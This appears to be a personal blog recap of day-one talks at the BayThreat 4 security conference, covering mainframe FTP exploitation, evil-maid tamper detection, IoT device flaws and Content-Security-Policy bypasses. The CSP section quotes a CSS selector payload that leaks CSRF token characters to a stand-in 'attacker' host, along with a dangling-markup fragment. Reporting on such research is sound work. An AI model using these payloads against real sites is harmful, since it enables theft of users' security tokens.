• The year is almost over, but the infosec community in the Bay Area shows no signs of slowing down with the fourth annual BayThreat conference happening this Friday and Saturday. I always loved smaller hacker cons for their much more personable feel and few carefully selected talks that you can see without missing a dozen others. I love BayThreat not only because it is a local event, but also due to the overall quality of the talks and organization being on par with many of the larger cons.

    BayThreat 4 marks the return to the Hacker Dojo, albeit at a different location, which in my opinion is even better than the original. Below are a few writeups on the talks from the breaker track that I had a chance to attend.

    Hacking Mainframes Like a Boss

    If you ever wanted to "Hack the Gibson" or just interested in attacking obscure yet highly sensitive targets this talk was a real treat. George Sarbanes &0xBA115 Polivka and Phillip Soldier of Fortran gave an excellent presentation on z/OS mainframes and several exploits. Apparently z/OS FTP servers can be used to execute arbitrary commands by uploading a JCL file and calling SITE FILE=JES command. Check out MainTP and ftp_jcl_app.rb to test out the code yourself.

    Phillip and George were nice enough to set up an emulated z/OS server for us to play with, but if you want to try out the exploits yourself install The Hercules z/Architecture Emulator on your personal computer.

    The main message of the talk was to encourage security researchers to take a look at mainframe security. Because of their relative obscurity a lot of vulnerabilities that were discovered and patched in more mainstream systems are waiting to be discovered on these aging giants.


    Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"

    The presentation by Eric Michaud (Rift Recon) and Ryan Lacket (CryptoSeal, Havenco, MetaColo and a few other ventures) introduced a novel methodology for visual detection of tampering with sensitive equipment such as a company laptop. Their concept works by taking pictures of a laptop fitted with tamper evident stickers before and after leaving the device unattended. A case of a classic "Evil Maid" attack. By utilizing computer vision algorithms on your smartphone they made it possible to cheaply and effectively detect evidence of tampering.

    Naturally the approach is not full proof, but considering just how cheap and effective it is to implement this, I think the final app, called Verifier, should be a pretty effective additional layer of defense.

    Other than the main presentation, I liked fun stories form the trenches such as AirFrance bugging first class seats to using rf emanations to detect unlicensed software copies running in the room.


    Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts

    A fun talk about the lack of security in many Internet enabled and remotely controlled home gadgets all while getting a private tour of Nitesh Dhanjani's apartment =].

    Phillips Hue Lighting System generates a username token used to authenticate to the wireless bridge by simply MD5-ing the mac address of the authenticating device (iPhone). Nitesh showed a video of an attack where he enumerated all of the connected devices on the network, obtained their MAC addresses and tried all of them to perform an action on the bridge. Once the attack script found a registered device, it went into a loop issuing the lights off command causing a continuous blackout.

    Belkin WeMo Baby Monitor allowed connection from any smartphone with the WeMo smartphone app on the local network. After the initial connection to the baby monitor, the smartphone app obtained a unique identifier which could be used to listen in to the audio stream on the baby monitor from any point on the internet. Belkin WeMo Switch had the same issue as the baby monitor: connect once, connect from anywhere.

    Belkin NetCam used a different infrastructure and required authentication over SSL. However, apparently the NetCam periodically sent login and password to a 3rd party box on the Internet in clear text.


    So You Want to Build A Burp Plugin?

    An educational talk by Monika Morrow introducing viewers to Burp plugin development in Java. Monika covered a new set of Burp APIs and illustrated several complete plugins to modify traffic and enhance Burp experience with additional context menus and notifications.


    Bypassing Content-Security-Policy

    A comprehensive talk by Alex kuza55 Kouzemtchenko on subverting CSP with a sample goal of leaking CSRF tokens embedded in the body of the page. Several classes of bypasses were demonstrated in the presentation:

    Dangling Markup Injection involved the use of the classic img-src , form-action , button, option, font-src * etc. to embed half-completed markgup (e.g <form action=''><textarea>) so that the page in its entirety including whatever hidden CSRF token would be submitted to the attacker page.

    Abusing CSS3 selectors to sequentially extract csrf token values. This trick works by using a targeted CSS selector input[name=csrf_token][value=^a] and triggering the corresponding action to the attacker's site using background-image: background-image: url(http://attacker/log?^a)

    Abusing SVG Files to leak page contents and do a lot more damage.

    Using user installed plugins such as Flash, Adobe Reader, etc. to abuse plugin specific functionality (e.g.

    Next, Alex went into a separate class of application specific attacks using JSONP callbacks, browser specific flaws or just abusing unsafe-evals in sites' scripts.

    I found attacks utilizing Content Delivery Networks like Akamai particularly interesting because of them exposing your site by hosting vulnerable versions of scripts on the same shared domain as you regardless of the scripts that your site actually uses.

    Several slides were dedicated to various vulnerable JavaScript frameworks with injections into JS-based template systems, abusing framework-specific objects and functionality. A great deal of time was spent on Angular-JS framework on what they did right and what could still be improved.

    To finish off the presentation, Alex covered some of the browser mitigations to the above attack vectors and how to bypass them once more.

    I would highly recommend going over Alex's presentation with a fine comb as a comprehensive guide on various injection and bypass attack vectors in modern browsers once slides become available.


    Not bad for the first day, time to get some sleep and get ready for more excellent people and talks tomorrow.


    08 dec
    baythreat 4 - day two

    After a great day of hanging out with old and new friends all while getting inspired to start breaking/researching anything ranging from 50 year old behemoths to Internet enabled light bulbs, I raced down peninsula to the epicenter of Bay Area's security community at Hacker Dojo. Baythreat Day Two has begun.

    In a terrible miscalculation of a sleeping schedule I have regretfully missed several morning talks; however, below are the writeups of another series of excellent presentations from the breaker track for the remainder of the day. Read more.

    12 dec
    isec open forum bay area

    It feels like the infosec community in the Bay Area is just getting warmed up toward the end of the year with another quarterly iSec Open Forum. As a small and local security event, it usually hosts novel security topics from local security professionals that may not appear in more mainstream events. After getting to the talks area at the end of a long hall with folks from Dropbox zooming by on their skateboards and razorblades, I found an infosec crowd of about a hundred or so people ready to learn and connect.

    Below are my notes from the event: Read more.


    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.